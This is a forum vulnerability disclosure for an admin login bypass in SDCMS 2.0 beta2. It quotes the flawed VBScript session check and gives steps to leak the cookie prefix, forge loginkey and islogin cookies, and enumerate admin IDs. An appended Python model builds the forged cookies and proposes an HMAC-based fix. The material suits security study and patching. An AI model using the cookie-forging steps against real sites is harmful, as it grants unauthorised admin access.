中国网络渗透测试联盟

Title: SDCMS backend bypass vulnerability (direct entry into the admin area)

Author: admin    Time: 2013-7-26 12:42
Title: SDCMS backend bypass vulnerability (direct entry into the admin area)
Brief description:

SDCMS backend bypass, direct entry into the admin area: tested on version 2.0 beta2; other versions not tested.
Detailed description:
islogin, the method that decides whether the user is logged in (the "author:" comments are the post's own annotations, translated; the InStr note is an editorial comment):

sub islogin()
    if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then
        dim t0,t1,t2
        t0=sdcms.getint(sdcms.loadcookie("adminid"),0)   ' read through loadcookie (see below)
        t1=sdcms.loadcookie("islogin")
        t2=sdcms.loadcookie("loginkey")
        ' author: this check is awful. strlen(t2)<>50 places no requirement on loginkey
        ' at all; any 50 characters are enough to continue past it
        if sdcms.strlen(t0)=0 or sdcms.strlen(t1)=0 or sdcms.strlen(t2)<>50 then
            sdcms.go "login.asp?act=out"
            exit sub
        else
            dim data
            ' author: looks the admin up by ID, and the ID is attacker-controlled
            data=sdcms.db.dbload(1,"adminid,adminname,adminpass,islock,groupid,g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&t0&"","")
            if ubound(data)<0 then
                sdcms.go "login.asp?act=out"
                exit sub
            else
                ' VBScript InStr returns 0 when the substring is absent (Null if an argument
                ' is Null), never a negative number, so "instr(...)<0" is never true: the
                ' decrypted islogin value is effectively not verified, and only islock=0
                ' can reject the request here
                if instr(data(1,0)&data(2,0),sdcms.decrypt(t1,t2))<0 or data(3,0)=0 then
                    sdcms.go "login.asp?act=out"
                    exit sub
                else
                    adminid=data(0,0)
                    adminname=data(1,0)
                    admin_page_lever=data(5,0)
                    admin_cate_array=data(6,0)
                    admin_cate_lever=data(7,0)
                    if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0
                    if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
                    if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0
                    if clng(admingroupid)<>0 then
                        admin_lever_where=" and menuid in("&admin_page_lever&")"
                    end if
                    ' from here on the forged cookies have become a real admin session
                    sdcms.setsession "adminid",adminid
                    sdcms.setsession "adminname",adminname
                    sdcms.setsession "admingroupid",data(4,0)
                end if
            end if
        end if
    else
        data=sdcms.db.dbload(1,"g.pagelever,g.catearray,g.catelever","sd_admin u left join sd_admin_group g on u.groupid=g.id","adminid="&adminid&"","")
        if ubound(data)<0 then
            sdcms.go "login.asp?act=out"
            exit sub
        else
            admin_page_lever=data(0,0)
            admin_cate_array=data(1,0)
            admin_cate_lever=data(2,0)
            if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0
            if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0
            if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0
            if clng(admingroupid)<>0 then
                admin_lever_where=" and menuid in("&admin_page_lever&")"
            end if
        end if
    end if
end sub
Proof of vulnerability:
Look at the functions that handle cookies:

public function loadcookie(t0)
    loadcookie=request.cookies(prefix&t0)
end function

public sub setcookie(byval t0,byval t1)
    response.cookies(prefix&t0)=t1
end sub

prefix is set in the configuration:

'Variable prefix. If this program is installed more than once under one hosting space, configure a different value for each copy
dim prefix
prefix="1Jb8Ob"

This value can be obtained simply by visiting admin/login.asp?act=out: the logout handler writes the prefixed cookies back empty, so the cookie names in the response reveal the prefix.

sub out
    sdcms.setsession "adminid",""
    sdcms.setsession "adminname",""
    sdcms.setsession "admingroupid",""
    sdcms.setcookie "adminid",""
    sdcms.setcookie "loginkey",""
    sdcms.setcookie "islogin",""
    sdcms.go "login.asp"
end sub

Exploitation: set the cookie prefix+loginkey to any 50 characters and prefix+islogin to anything, then loop over prefix+adminid (the default is 1). Then visit the admin backend and you are in.
Fix:
Modify the function!
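As an added example (not SDCMS code and not the author's exploit script), the following Python models the cookie branch of islogin() listed above, shows that the cookies the post describes (any 50-character loginkey, any islogin, adminid guessed upward from 1) are accepted, and places a hardened check beside it. The ADMINS table, SERVER_SECRET, make_loginkey(), forge_cookies() and the HMAC-based token are assumptions made for this example; the CMS's decrypt() routine is not in the post, so the model takes it as a parameter and defaults it to returning Null.

```python
"""
Model of the cookie branch of SDCMS 2.0 beta2 islogin(), the forged cookies the
post describes, and a hardened replacement.  Added example, not SDCMS code.
ADMINS, SERVER_SECRET, make_loginkey() and the HMAC token design are assumptions
for this example; the real CMS reads sd_admin from the database.
"""
import hashlib
import hmac
import secrets

# Constructed sample of sd_admin: adminid -> (adminname, adminpass, islock)
ADMINS = {
    1: ("admin", "e10adc3949ba59abbe56e057f20f883e", 1),
    2: ("editor", "5f4dcc3b5aa765d61d8327deb882cf99", 0),  # islock=0 rows are rejected
}

PREFIX = "1Jb8Ob"                          # cookie prefix from the 2.0 beta2 config (per the post)
SERVER_SECRET = secrets.token_bytes(32)    # assumption: per-install secret for the hardened check


def vbs_instr(haystack, needle):
    """VBScript InStr: 1-based position of needle, 0 when absent, Null (None) if needle is Null."""
    if needle is None:
        return None
    return haystack.find(needle) + 1


def _read(cookies):
    """Read the three prefixed cookies the way the original does (getint defaults to 0)."""
    try:
        adminid = int(cookies.get(PREFIX + "adminid", ""))
    except ValueError:
        adminid = 0
    return adminid, cookies.get(PREFIX + "islogin", ""), cookies.get(PREFIX + "loginkey", "")


def vulnerable_islogin(cookies, decrypt=lambda islogin, loginkey: None):
    """Mirrors the original checks; returns the adminid it would log in, or None."""
    adminid, islogin, loginkey = _read(cookies)
    # original: strlen(t0)=0 or strlen(t1)=0 or strlen(t2)<>50
    if not str(adminid) or not islogin or len(loginkey) != 50:
        return None
    row = ADMINS.get(adminid)              # "adminid=" & t0: lookup by attacker-chosen id
    if row is None:
        return None
    adminname, adminpass, islock = row
    # instr(adminname & adminpass, decrypt(t1, t2)) < 0 can never hold: InStr yields
    # 0 (or Null) on a miss, so the decrypted islogin value is never really verified
    pos = vbs_instr(adminname + adminpass, decrypt(islogin, loginkey))
    if (pos is not None and pos < 0) or islock == 0:
        return None
    return adminid


def make_loginkey(adminid, adminname, adminpass):
    """Hardened token (assumption): HMAC over the identity fields under a server secret."""
    msg = f"{adminid}|{adminname}|{adminpass}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def hardened_islogin(cookies):
    """Same inputs, but the client must present a token it cannot compute or guess."""
    adminid, _islogin, loginkey = _read(cookies)
    row = ADMINS.get(adminid)
    if row is None:
        return None
    adminname, adminpass, islock = row
    if islock == 0:
        return None
    expected = make_loginkey(adminid, adminname, adminpass)
    if not hmac.compare_digest(loginkey.encode(), expected.encode()):  # constant-time compare
        return None
    return adminid


def forge_cookies(adminid, prefix=PREFIX):
    """The cookies the post describes: any 50-char loginkey, any islogin, a guessed adminid."""
    return {
        prefix + "adminid": str(adminid),
        prefix + "islogin": "x",
        prefix + "loginkey": "A" * 50,
    }


def cookie_header(cookies):
    """Render the cookie dict as the value of a Cookie: request header."""
    return "; ".join(f"{k}={v}" for k, v in cookies.items())


def enumerate_adminids(check, limit=20):
    """Loop prefix+adminid as the post suggests; return the first id the check accepts."""
    for adminid in range(1, limit + 1):
        if check(forge_cookies(adminid)) is not None:
            return adminid
    return None


if __name__ == "__main__":
    print("Cookie:", cookie_header(forge_cookies(1)))
    print("vulnerable check accepts adminid:", enumerate_adminids(vulnerable_islogin))
    print("hardened check accepts adminid:", enumerate_adminids(hardened_islogin))
```

Run stand-alone it prints the forged Cookie header, shows the vulnerable check accepting adminid 1 (the locked editor row is the only thing the original can reject), and shows the hardened check accepting nothing until a server-issued token is presented. The point of the hardened version is that the token is derived from a secret the client never sees and compared in constant time, so neither a length check nor the InStr comparison is what stands between a forged cookie and an admin session.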




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2